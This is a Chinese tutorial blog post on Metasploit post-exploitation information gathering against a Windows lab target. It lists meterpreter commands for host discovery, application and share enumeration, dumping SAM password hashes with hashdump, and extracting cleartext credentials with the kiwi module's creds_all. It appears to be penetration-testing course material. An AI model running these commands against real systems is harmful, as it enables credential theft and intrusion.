12.6、后渗透测试--Windows系统下信息收集模块

本文介绍如何利用Metasploit进行后渗透测试操作,包括存活主机发现、应用程序枚举、查看用户信息及共享文件等内容,并提供具体命令示例。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一、存活主机发现

步骤1、使用arp查看缓冲表:
meterpreter > arp
步骤2、局域网内存活主机发现:
meterpreter >  run post/windows/gather/arp_scanner RHOSTS=172.16.0.0/24

二、应用程序枚举

方法1:  获取靶机上的软件安装信息
meterpreter > run post/windows/gather/enum_applications
靶机上安装百度网盘应用后再检测:
方法2:  获取靶机最近访问过的文档、链接等信息
meterpreter >  run post/windows/gather/dumplinks

三、查看最近登录的用户

meterpreter > run post/windows/gather/enum_logged_on_users
  

四、查看共享文件

靶机上查看共享:
kail攻击机上: meterpret >  run post/windows/gather/enum_shares

五、查看用户hash

机制:从SAM数据库导出密码的哈希
方法1: hashdump
方法2: meterpreter > run post/windows/gather/hashdump

 得到用户的密码与对应的hash值。

六、查看usb历史记录

meterpreter > run post/windows/gather/usb_history
没有usb设备使用记录。
给靶机添加一个usb设备:
此时,再查看usb历史记录:

七、获取用户明文认证信息

加载模块: meterpret > load kiwi
查看指令集: help
获取所有认证信息 :creds_all

八、参考

4-30 后渗透测试实验 - 主机敏感信息泄露防御_哔哩哔哩_bilibili

4-31 Windows系统后渗透测试常用模块 - 主机发现_哔哩哔哩_bilibili

4-32 Windows系统后渗透测试常用模块 - 应用程序枚举_哔哩哔哩_bilibili

4-33 Windows系统后渗透测试常用模块 - 收集信息_哔哩哔哩_bilibili

4-35 Windows后渗透测试插件-获取用户明文认证信息_哔哩哔哩_bilibili

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值